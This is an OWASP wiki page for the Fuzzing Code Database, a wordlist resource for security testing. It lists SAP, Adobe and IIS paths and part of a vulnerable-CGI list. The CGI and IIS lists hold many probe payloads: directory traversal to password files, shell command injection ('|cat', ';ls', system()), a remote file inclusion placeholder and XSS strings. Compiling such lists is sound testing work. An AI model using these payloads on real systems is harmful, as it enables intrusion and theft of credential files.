https://wiki.owasp.org/api.php?action=feedcontributions&user=Foobar23&feedformat=atom
OWASP - User contributions [en]
2024-03-28T23:33:03Z
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=197793
Category:OWASP Fuzzing Code Database
2015-07-23T11:37:21Z
<p>Foobar23: Updated my contact information - I don't use Foobar@email.de anymore</p>
<hr />
<div>[[Image:OWASP Inactive Banner.jpg|800px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Inactive_Projects]]<br />
This database is a collection of statements used in code injection, fuzzing and brute-force approaches. All too often, security professionals rely on their own repositories of statements collected from assessments they have conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging those from several projects such as [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions, to build a comprehensive dataset of effective statements that gives better testing results. Please add your own statements and check out the statements already added. <br />
<br />
==== News ====<br />
<br />
'''10 November 2011'''<br />
<br />
*Update Category: SAP Common URL Web Interfaces (10 November 2011 - Total Statements: 155)<br />
<br />
'''08 November 2010'''<br />
<br />
*Created new Category: Adobe XML Files (08 November 2010 - Total Statements: 16)<br />
<br />
'''15 September 2010'''<br />
<br />
*Created new Category: SAP Common URL Web Interfaces (15 September 2010 - Total Statements: 6)<br />
<br />
'''17 March 2010'''<br />
<br />
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)<br />
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)<br />
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)<br />
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)<br />
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)<br />
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)<br />
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)<br />
<br />
'''16 March 2010'''<br />
<br />
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)<br />
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) <br />
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)<br />
<br />
<br />
'''02 February 2010'''<br />
<br />
*Created new Category: Lotus/Notes Files<br />
<br />
'''11 August 2009''' <br />
<br />
*Created new Category: XML Attacks<br />
<br />
''Update Statements'' <br />
<br />
*15 new XML Statements <br />
*93 new SQL Injections Statements <br />
*67 new Traversal Directory Statements <br />
*Deleted 33 duplicate XSS Statements <br />
*30 New XSS Statements<br />
<br />
'''7 August 2009''' <br />
<br />
*Updated the objectives of the project.<br />
<br />
'''21 July 2009''' <br />
<br />
*Set the team responsible for the project.<br />
<br />
==== Goals ====<br />
<br />
This project intends to create a database that brings together all tools that are based on wordlists, such as WebScarab, JBroFuzz, WebSlayer, DirBuster and others. In addition to the current tools developed by OWASP members, we will create a database in a style similar to the Open Vulnerability and Assessment Language (OVAL), where any tool can adopt and use an XML file maintained by OWASP. <br />
<br />
In addition, the following functionalities will be included in this project: <br />
<br />
1 - The statements of the ASDR Project <br />
<br />
2 - Browser <br />
<br />
3 - Operating System <br />
<br />
4 - Databases <br />
<br />
A URL will also be published to create a collaborative environment for the maintenance process, where the following features are planned: <br />
<br />
1 - Deploy a process where a new statement can be suggested and registered if it is not valid yet and not maintained in another database. <br />
<br />
2 - A list where, besides the statement, a single ID will be maintained to identify each statement, with a description and the results of the exploitation. <br />
<br />
3 - Support for users reporting their own experiences with the statements. <br />
<br />
==== Statements ====<br />
<br />
=== Adobe XML Files (08 November 2010) ===<br />
<pre><br />
/flex2gateway/<br />
/flex2gateway/http<br />
/flex2gateway/httpsecure<br />
/flex2gateway/cfamfpoolling<br />
/flex2gateway/amf<br />
/flex2gateway/amfpolling<br />
/messagebroker/http<br />
/messagebroker/httpsecure<br />
/blazeds/messagebroker/http<br />
/blazeds/messagebroker/httpsecure<br />
/samples/messagebroker/http<br />
/samples/messagebroker/httpsecure<br />
/lcds/messagebroker/http<br />
/lcds/messagebroker/httpsecure<br />
/lcds-samples/messagebroker/http<br />
/lcds-samples/messagebroker/httpsecure<br />
</pre><br />
<br />
=== SAP Common URL Web Interface (10 November 2011) ===<br />
<pre><br />
/rep/build_info.html<br />
/rep/build_info.jsp<br />
/run/build_info.html<br />
/run/build_info.jsp<br />
/rwb/version.html<br />
/sap/bc/bsp/esh_os_service/favicon.gif<br />
/sap/bc/bsp/sap<br />
/sap/bc/bsp/sap/alertinbox<br />
/sap/bc/bsp/sap/bsp_dlc_frcmp<br />
/sap/bc/bsp/sap/bsp_veri<br />
/sap/bc/bsp/sap/bsp_verificatio<br />
/sap/bc/bsp/sap/bsp_wd_base<br />
/sap/bc/bsp/sap/bspwd_basics<br />
/sap/bc/bsp/sap/certmap<br />
/sap/bc/bsp/sap/certreq<br />
/sap/bc/bsp/sap/crm_bsp_frame<br />
/sap/bc/bsp/sap/crmcmp_bpident/<br />
/sap/bc/bsp/sap/crmcmp_brfcase<br />
/sap/bc/bsp/sap/crmcmp_hdr<br />
/sap/bc/bsp/sap/crmcmp_hdr_std<br />
/sap/bc/bsp/sap/crmcmp_ic_frame<br />
/sap/bc/bsp/sap/crm_thtmlb_util<br />
/sap/bc/bsp/sap/crm_ui_frame<br />
/sap/bc/bsp/sap/crm_ui_start<br />
/sap/bc/bsp/sap/esh_sap_link<br />
/sap/bc/bsp/sap/esh_sapgui_exe<br />
/sap/bc/bsp/sap/graph_bsp_test<br />
/sap/bc/bsp/sap/graph_bsp_test/Mimes<br />
/sap/bc/bsp/sap/gsbirp<br />
/sap/bc/bsp/sap/htmlb_samples<br />
/sap/bc/bsp/sap/iccmp_bp_cnfirm<br />
/sap/bc/bsp/sap/iccmp_hdr_cntnr<br />
/sap/bc/bsp/sap/iccmp_hdr_cntnt<br />
/sap/bc/bsp/sap/iccmp_header<br />
/sap/bc/bsp/sap/iccmp_ssc_ll/<br />
/sap/bc/bsp/sap/ic_frw_notify<br />
/sap/bc/bsp/sap/it00<br />
/sap/bc/bsp/sap/public/bc<br />
/sap/bc/bsp/sap/public/graphics<br />
/sap/bc/bsp/sap/sam_demo<br />
/sap/bc/bsp/sap/sam_notifying<br />
/sap/bc/bsp/sap/sam_sess_queue<br />
/sap/bc/bsp/sap/sbspext_htmlb<br />
/sap/bc/bsp/sap/sbspext_xhtmlb<br />
/sap/bc/bsp/sap/spi_admin<br />
/sap/bc/bsp/sap/spi_monitor<br />
/sap/bc/bsp/sap/sxms_alertrules<br />
/sap/bc/bsp/sap/system<br />
/sap/bc/bsp/sap/thtmlb_scripts<br />
/sap/bc/bsp/sap/thtmlb_styles<br />
/sap/bc/bsp/sap/uicmp_ltx<br />
/sap/bc/bsp/sap/xmb_bsp_log<br />
/sap/bc/contentserver<br />
/sap/bc/echo<br />
/sap/bc/error<br />
/sap/bc/FormToRfc<br />
/sap/bc/graphics/net<br />
/sap/bc/gui/sap/its/CERTREQ<br />
/sap/bc/gui/sap/its/designs<br />
/sap/bc/gui/sap/its/webgui<br />
/sap/bc/IDoc_XML<br />
/sap/bc/ping<br />
/sap/bc/report<br />
/sap/bc/soap/ici<br />
/sap/bc/soap/rfc<br />
/sap/bc/srt/IDoc<br />
/sap/bc/wdvd<br />
/sap/bc/webdynpro/sap/apb_launchpad<br />
/sap/bc/webdynpro/sap/apb_launchpad_nwbc<br />
/sap/bc/webdynpro/sap/apb_lpd_light_start<br />
/sap/bc/webdynpro/sap/apb_lpd_start_url<br />
/sap/bc/webdynpro/sap/application_exit<br />
/sap/bc/webdynpro/sap/appl_log_trc_viewer<br />
/sap/bc/webdynpro/sap/appl_soap_management<br />
/sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv<br />
/sap/bc/webdynpro/sap/cnp_light_test<br />
/sap/bc/webdynpro/sap/configure_application<br />
/sap/bc/webdynpro/sap/configure_component<br />
/sap/bc/webdynpro/sap/esh_search_results.ui<br />
/sap/bc/webdynpro/sap/esh_adm_smoketest_ui<br />
/sap/bc/webdynpro/sap/sh_adm_smoketest_files<br />
/sap/bc/webdynpro/sap/esh_eng_modelling<br />
/sap/bc/webdynpro/sap/esh_admin_ui_component<br />
/sap/bc/webdynpro/sap/wdhc_application<br />
/sap/bc/webdynpro/sap/wd_analyze_config_appl<br />
/sap/bc/webdynpro/sap/wd_analyze_config_comp<br />
/sap/bc/webdynpro/sap/wd_analyze_config_user<br />
/sap/bc/webdynpro/sap/WDR_TEST_ADOBE<br />
/sap/bc/webdynpro/sap/WDR_TEST_EVENTS<br />
/sap/bc/webdynpro/sap/wdr_test_popups_rt<br />
/sap/bc/webdynpro/sap/WDR_TEST_TABLE<br />
/sap/bc/webdynpro/sap/wdr_test_ui_elements<br />
/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR<br />
/sap/bc/webrfc<br />
/sap/bc/xrfc<br />
/sap/bc/xrfc_test<br />
/sap/es/cockpit<br />
/sap/es/getdocument<br />
/sap/es/opensearch<br />
/sap/es/opensearch/description<br />
/sap/es/opensearch/list<br />
/sap/es/opensearch/search<br />
/sap/es/saplink<br />
/sap/es/search<br />
/sap/es/redirect<br />
/sap/crm<br />
/sap/public/bc<br />
/sap/public/bc/icons<br />
/sap/public/bc/icons_rtl<br />
/sap/public/bc/its/mimes<br />
/sap/public/bc/its/mimes/system/SL/page/hourglass.html<br />
/sap/public/bc/its/mobile/itsmobile00<br />
/sap/public/bc/its/mobile/itsmobile01<br />
/sap/public/bc/its/mobile/rfid<br />
/sap/public/bc/its/mobile/start<br />
/sap/public/bc/its/mobile/test<br />
/sap/public/bc/NWDEMO_MODEL<br />
/sap/public/bc/NW_ESH_TST_AUTO<br />
/sap/public/bc/pictograms<br />
/sap/public/bc/sicf_login_run<br />
/sap/public/bc/trex<br />
/sap/public/bc/ur<br />
/sap/public/bc/wdtracetool<br />
/sap/public/bc/webdynpro/adobechallenge<br />
/sap/public/bc/webdynpro/mimes<br />
/sap/public/bc/webdynpro/ssr<br />
/sap/public/bc/webdynpro/viewdesigner<br />
/sap/public/bc/webicons<br />
/sap/public/bc/workflow<br />
/sap/public/bc/workflow/shortcut<br />
/sap/public/bsp/sap<br />
/sap/public/bsp/sap/htmlb<br />
/sap/public/bsp/sap/public<br />
/sap/public/bsp/sap/public/bc<br />
/sap/public/bsp/sap/public/faa<br />
/sap/public/bsp/sap/public/graphics<br />
/sap/public/bsp/sap/public/graphics/jnet_handler<br />
/sap/public/bsp/sap/public/graphics/mimes<br />
/sap/public/bsp/sap/system<br />
/sap/public/bsp/sap/system_public<br />
/sap/public/icf_check<br />
/sap/public/icf_info<br />
/sap/public/icf_info/icr_groups<br />
/sap/public/icf_info/icr_urlprefix<br />
/sap/public/icf_info/logon_groups<br />
/sap/public/icf_info/urlprefix<br />
/sap/public/icman<br />
/sap/public/info<br />
/sap/public/myssocntl<br />
/sap/public/ping<br />
/sap/webcuif<br />
/sap/public/icman/ping<br />
/sap/admin<br />
/sap/wdisp/admin<br />
/scripts/wgate<br />
</pre><br />
<br />
=== Microsoft URLs (8 April 2010) ===<br />
<pre># Interesting IIS Files & Directories (8 April 2010)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
# Look at the result codes in the headers - 403 likely means the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404s for 403s. <br />
# Alternatively, slight differences in the number of bytes returned will help differentiate.<br />
<br />
/.printer<br />
/%NETHOOD%/<br />
/<script>alert('XSS')</script>.aspx<br />
/AccessPlatform/<br />
/AccessPlatform/auth/<br />
/AccessPlatform/auth/clientscripts/cookies.js <br />
/AccessPlatform/auth/clientscripts/login.js <br />
/Exadmin/<br />
/ExchWeb/<br />
/Exchange/<br />
/Microsoft-Server-ActiveSync/<br />
/OMA/<br />
/OWA/<br />
/Public/<br />
/_layouts/alllibs.htm<br />
/_layouts/settings.htm<br />
/_layouts/userinfo.htm<br />
/_vti_bin/<br />
/_vti_bin/_vti_aut/fp30reg.dll<br />
/_vti_pvt/<br />
/_WEB_INF/<br />
/a%5c.aspx<br />
/adovbs.inc<br />
/aspnet_files/<br />
/certcontrol/<br />
/certenroll/<br />
/certsrv/<br />
/citrix/<br />
/citrix/AccessPlatform/auth/<br />
/citrix/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/auth/clientscripts/<br />
/Citrix//AccessPlatform/auth/clientscripts/cookies.js <br />
/Citrix/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix/PNAgent/config.xml<br />
/exchange/root.asp<br />
/forum.asp<br />
/forum_arc.asp<br />
/forum_professionnel.asp<br />
/iisadmin/<br />
/iisadmpwd/achg.htr<br />
/iisadmpwd/aexp.htr<br />
/iisadmpwd/aexp2.htr<br />
/iisadmpwd/aexp2b.htr<br />
/iisadmpwd/aexp3.htr<br />
/iisadmpwd/aexp4.htr<br />
/iisadmpwd/aexp4b.htr<br />
/iisadmpwd/anot.htr<br />
/iisadmpwd/anot3.htr<br />
/iiasdmpwd/<br />
/iishelp/<br />
/iishelp/iis/misc/default.asp<br />
/iissamples/<br />
/imprimer.asp<br />
/includes/adovbs.inc<br />
/msadc/<br />
/null.htw<br />
/pbserver/pbserver.dll<br />
/postinfo.html<br />
/rubrique.asp<br />
/scripts/<br />
/scripts/fpcount.exe<br />
/scripts/cgimail.exe<br />
/scripts/tools/newdsn.exe<br />
/scripts/tools/getdrvs.exe<br />
/scripts/convert.bas<br />
/cgi-bin/htmlscript<br />
/scripts/counter.exe<br />
/scripts/no-such-file.pl<br />
/share/<br />
/tsweb/<br />
/~/<script>alert('XSS')</script>.asp<br />
/~/<script>alert('XSS')</script>.aspx<br />
/index.shtml<br />
/x.htw<br />
/x.ida<br />
/x.idq<br />
/cgi<br />
/scripts/iisadmin/ism.dll?http/dir<br />
/scripts/samples/search/webhits.exe<br />
</pre><br />
<br />
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===<br />
<pre># Vulnerable Cross-Platform CGI (17 March 2010) <br />
# fuzz inside cgi directories<br />
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi<br />
# adam.muntner@quietmove.com<br />
<br />
%2e%2e/abyss.conf<br />
.access<br />
.cobalt<br />
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')><br />
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script><br />
.fhp<br />
.htaccess<br />
.htaccess.old<br />
.htaccess.save<br />
.htaccess~<br />
.htpasswd<br />
.nsconfig<br />
.passwd<br />
.www_acl<br />
.wwwacl<br />
/_vti_pvt/doctodep.btr<br />
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
AT-admin.cgi<br />
AT-generate.cgi<br />
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0<br />
AnyBoard.cgi<br />
AnyForm<br />
AnyForm2<br />
Backup/add-passwd.cgi<br />
C<br />
Count.cgi<br />
DC<br />
DCFORM<br />
File<br />
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com<br />
FormMail.cgi?<script>alert(\<br />
FormMail.pl<br />
ImageFolio/admin/admin.cgi<br />
LWGate<br />
LWGate.cgi<br />
Upload.pl<br />
Vs<br />
W<br />
YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00<br />
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script><br />
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}<br />
add_ftp.cgi<br />
addbanner.cgi<br />
adduser.cgi<br />
admin.cgi<br />
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}<br />
admin.php<br />
admin.php3<br />
admin.pl<br />
adminhot.cgi<br />
adminwww.cgi<br />
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
aglimpse<br />
aglimpse.cgi<br />
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,<br />
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
amadmin.pl<br />
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}<br />
ans.pl?p=../../../../../usr/bin/id|&blah<br />
ans/ans.pl?p=../../../../../usr/bin/id|&blah<br />
anyboard.cgi<br />
archie<br />
architext_query.cgi<br />
architext_query.pl<br />
ash<br />
astrocam.cgi<br />
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL<br />
auction/auction.cgi?action=<br />
auctiondeluxe/auction.pl<br />
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}<br />
auth_data/auth_user_file.txt<br />
awl/auctionweaver.pl<br />
awstats.pl<br />
awstats/awstats.pl<br />
ax-admin.cgi<br />
ax.cgi<br />
axs.cgi<br />
badmin.cgi<br />
banner.cgi<br />
bannereditor.cgi<br />
bash<br />
bb-hist?HI<br />
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbs_forum.cgi<br />
betsie/parserl.pl/<script>alert('XSS')</script>;<br />
bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=<br />
bizdb1-search.cgi<br />
blog/<br />
blog/mt-check.cgi<br />
blog/mt-load.cgi<br />
blog/mt.cfg<br />
bnbform<br />
bnbform.cgi<br />
book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10<br />
boozt/admin/index.cgi?section=5&input=1<br />
bsguest.cgi?email=x;ls<br />
bslist.cgi?email=x;ls<br />
build.cgi<br />
bulk/bulk.cgi<br />
c_download.cgi<br />
cached_feed.cgi<br />
cachemgr.cgi<br />
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00<br />
calendar<br />
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22<br />
calendar.pl<br />
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calendar/index.cgi<br />
calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calender_admin.pl<br />
campas?%0acat%0a{KNOWNFILE}%0a<br />
cart.pl<br />
cart.pl?db='<br />
cartmanager.cgi<br />
cbmc/forums.cgi<br />
ccbill-local.cgi?cmd=MENU<br />
ccbill-local.pl?cmd=MENU<br />
cgforum.cgi<br />
cgi-lib.pl<br />
cgicso?query=<script>alert('XSS')</script><br />
cgicso?query=AAA<br />
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00<br />
cgiwrap<br />
cgiwrap/%3Cfont%20color=red%3E<br />
cgiwrap/~@U<br />
cgiwrap/~JUNK(5)<br />
cgiwrap/~root<br />
change-your-password.pl<br />
classified.cgi<br />
classifieds<br />
classifieds.cgi<br />
classifieds/classifieds.cgi<br />
classifieds/index.cgi<br />
clickcount.pl?view=test<br />
clickresponder.pl<br />
code.php<br />
code.php3<br />
com5..........................................................................................................................................................................................................................box<br />
com5.java<br />
com5.pl<br />
commandit.cgi<br />
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html<br />
common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}<br />
common/listrec.pl<br />
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|<br />
compatible.cgi<br />
count.cgi<br />
counter-ord<br />
counterbanner<br />
counterbanner-ord<br />
counterfiglet-ord<br />
counterfiglet/nc/<br />
cs<br />
csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csLive<br />
csNews.cgi<br />
csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csPassword.cgi<br />
csPassword/csPassword.cgi<br />
csh<br />
cstat.pl<br />
cutecast/members/<br />
cvsblame.cgi?file=<script>alert('XSS')</script><br />
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script><br />
cvslog.cgi?file=<script>alert('XSS')</script><br />
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script><br />
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week<br />
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD<br />
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script><br />
dasp/fm_shell.asp<br />
data/fetch.php?page=<br />
date<br />
day5datacopier.cgi<br />
day5datanotifier.cgi<br />
db2www/library/document.d2w/show<br />
db4web_c/dbdirname/{KNOWNFILE}<br />
db_manager.cgi<br />
dbman/db.cgi?db=no-db<br />
dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00<br />
dcshop/auth_data/auth_user_file.txt<br />
dcshop/orders/orders.txt<br />
dfire.cgi<br />
diagnose.cgi<br />
dig.cgi<br />
directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00<br />
displayTC.pl<br />
dnewsweb<br />
donothing<br />
dose.pl?daily&somefile.txt&|ls|<br />
download.cgi<br />
dumpenv.pl<br />
edit.pl<br />
empower?DB=whateverwhatever<br />
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
enter.cgi<br />
environ.cgi<br />
environ.pl<br />
environ.pl?param1=<script>alert(document.cookie)</script><br />
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
eshop.pl/seite=;cat%20eshop.pl|<br />
ex-logger.pl<br />
excite<br />
excite;IF<br />
ezadmin.cgi<br />
ezboard.cgi<br />
ezman.cgi<br />
ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|<br />
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1<br />
ezshopper2/loadpage.cgi<br />
ezshopper3/loadpage.cgi<br />
faqmanager.cgi?toc={KNOWNFILE}%00<br />
faxsurvey?cat%20{KNOWNFILE}<br />
filemail<br />
filemail.pl<br />
finger<br />
finger.pl<br />
flexform<br />
flexform.cgi<br />
fom.cgi?file=<script>alert('XSS')</script><br />
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable<br />
formmail<br />
formmail.cgi<br />
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail.pl<br />
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
fortune<br />
ftp.pl<br />
ftpsh<br />
gH.cgi<br />
gbadmin.cgi?action=change_adminpass<br />
gbadmin.cgi?action=change_automail<br />
gbadmin.cgi?action=colors<br />
gbadmin.cgi?action=setup<br />
gbook/gbook.cgi?_MAILTO=xx;ls<br />
gbpass.pl<br />
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1<br />
getdoc.cgi<br />
gettransbitmap<br />
glimpse<br />
gm-authors.cgi<br />
gm-cplog.cgi<br />
gm.cgi<br />
guestbook.cgi<br />
guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|<br />
guestbook.pl<br />
guestbook/passwd<br />
handler.cgi<br />
hitview.cgi<br />
horde/test.php<br />
horde/test.php?mode=phpinfo<br />
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00<br />
htgrep?file=index.html&hdr={KNOWNFILE}<br />
html2chtml.cgi<br />
html2wml.cgi<br />
htmlscript?../../../../../../../../../..{KNOWNFILE}<br />
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E<br />
htsearch?-c/nonexistant<br />
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=<br />
htsearch?exclude=%60{KNOWNFILE}%60<br />
ibill.pm<br />
icat<br />
if/admin/nph-build.cgi<br />
ikonboard/help.cgi?<br />
imageFolio.cgi<br />
imagefolio/admin/admin.cgi<br />
imagemap<br />
include/new-visitor.inc.php<br />
index.js0x70<br />
index.pl<br />
info2www<br />
info2www '(../../../../../../../bin/mail root <{KNOWNFILE}><br />
infosrch.cgi<br />
ion-p?page=../../../../..{KNOWNFILE}<br />
jailshell<br />
jj<br />
journal.cgi?folder=journal.cgi%00<br />
ksh<br />
lastlines.cgi?process<br />
listrec.pl<br />
loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}<br />
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
log-reader.cgi<br />
log/<br />
log/nether-log.pl?checkit<br />
login.cgi<br />
login.pl<br />
login.pl?course_id=\<br />
logit.cgi<br />
logs.pl<br />
logs/<br />
logs/access_log<br />
logs/error_log<br />
lookwho.cgi<br />
ls<br />
lwgate<br />
lwgate.cgi<br />
magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../..{KNOWNFILE}<br />
mail<br />
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00<br />
mailit.pl<br />
maillist.cgi<br />
maillist.pl<br />
mailnews.cgi<br />
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}<br />
majordomo.pl<br />
man2html<br />
mastergate/search.cgi?search=0&search_on=all<br />
meta.pl<br />
mgrqcgi<br />
mini_logger.cgi<br />
mmstdod.cgi<br />
moin.cgi?test<br />
mojo/mojo.cgi<br />
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=blah<br />
ms_proxy_auth_query/<br />
mt-static/<br />
mt-static/mt-check.cgi<br />
mt-static/mt-load.cgi<br />
mt-static/mt.cfg<br />
mt/<br />
mt/mt-check.cgi<br />
mt/mt-load.cgi<br />
mt/mt.cfg<br />
multihtml.pl?multi={KNOWNFILE}%00html<br />
musicqueue.cgi<br />
myguestbook.cgi?action=view<br />
namazu.cgi<br />
nbmember.cgi?cmd=list_all_users<br />
netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}<br />
netpad.cgi<br />
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}<br />
nimages.php<br />
nlog-smb.cgi<br />
nlog-smb.pl<br />
non-existent.pl<br />
noshell<br />
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
nph-error.pl<br />
nph-exploitscanget.cgi<br />
nph-maillist.pl<br />
nph-publish<br />
nph-publish.cgi<br />
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0<br />
nph-test-cgi<br />
ntitar.pl<br />
opendir.php?{KNOWNFILE}<br />
orders/orders.txt<br />
pagelog.cgi<br />
pals-cgi?palsAction=restart&documentName={KNOWNFILE}<br />
parse-file<br />
pass<br />
passwd<br />
passwd.txt<br />
password<br />
pbcgi.cgi?name=Joe%Camel&email=%3C<br />
perl<br />
perl?-v<br />
perlshop.cgi<br />
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}<br />
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
phf<br />
phf.cgi?QALIA<br />
phf?Qname=root%0Acat%20{KNOWNFILE}%20<br />
photo/<br />
photo/manage.cgi<br />
photo/protected/manage.cgi<br />
php-cgi<br />
php.cgi?{KNOWNFILE}<br />
plusmail<br />
pollit/Poll_It_<br />
pollssi.cgi<br />
post-query<br />
post_query<br />
postcards.cgi<br />
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
printenv<br />
printenv.tmp<br />
probecontrol.cgi?command=enable&username=cancer&password=killer<br />
processit.pl<br />
profile.cgi<br />
pu3.pl<br />
